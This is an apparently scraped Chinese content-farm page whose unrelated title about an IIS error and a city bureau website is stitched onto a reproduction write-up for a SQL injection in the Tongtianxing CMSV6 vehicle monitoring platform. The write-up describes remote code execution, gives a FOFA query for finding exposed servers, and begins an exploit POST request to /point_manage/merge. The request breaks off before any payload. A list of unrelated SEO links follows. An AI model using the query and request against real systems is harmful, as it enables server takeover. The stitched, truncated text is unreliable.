当前位置: 首页 > news >正文

iis网站在点默认文档的时候报错.廊坊市 广阳区城市建设局网站

iis网站在点默认文档的时候报错.,廊坊市 广阳区城市建设局网站,社区网站建设论文,网页兼容性 网站开发0x01 产品简介 通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。 0x02 漏洞概述 …

0x01 产品简介

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

0x02 漏洞概述

2024年5月,通天星CMSV6发布新版本修复了一处SQL注入漏洞。漏洞是由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复漏洞。

0x03 影响范围

通天星CMSV6车载定位监控平台 < 7.33.0.7_20240508

0x04 复现环境

FOFA:body="/808gps/"

0x05 漏洞复现

Exp

POST /point_manage/merge HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2882.93 Safari/537.36
Content-Type: application/x-www-for
http://www.yayakq.cn/news/469135/

相关文章:

  • 中关村网站建设接单app平台有哪些
  • 做宣传的视频网站有哪些无锡高端网站建设开发
  • 广东省网站备案注销做网站的技术哪个简单
  • 访问失效链接 如何删除 网站维护东莞网站设计在哪里
  • 如何做网站推广私人wordpress点击插件
  • 成都分想设计公司网站石家庄网站建设seo优化营销
  • 通化公司做网站ps做网站需要几个画布
  • 亚马逊网站开发手机购物网站 设计
  • 旅游网站模板大全一个新产品怎么推广
  • 中国建设银行对公网站首页西宁最好的建站公司
  • 网站建设服务详细解读天猫网站设计特点
  • 做cpa搭建哪个网站比较好广州白云区网站建设公司
  • 衡阳网站建设专家如何将page转换wordpress
  • 徐州网站建设专家wordpress如何去除页眉部分
  • openwrt 网站开发wordpress标签分页显示
  • 怎样网站建设改号宝网站搭建
  • 黑龙江建设银行网站深圳建筑设计平台网站
  • 用国外服务器做违法网站东莞专业做网站的公司有哪些
  • asp公司网站源码如何获取网站域名证书
  • 做网站背景图片成都app制作开发团队
  • 北京上地做网站wordpress取消自适应
  • 做网站企业企业推广哪个平台好
  • scratch网站开发镇江网站网站建设
  • 哪些网站可以免费做简历ps网站切图教程
  • 大理网站建设网站建设的安全可行性
  • 个人网站页面模板昆明网站做的好的公司哪家好
  • 做网站不切片可以吗weekly做网站
  • 邯郸网站建设行情自己搞个网站
  • 免费劳务网站建设wordpress 主题 mirana免费下载
  • 章丘做网站公司做电影资源网站手机版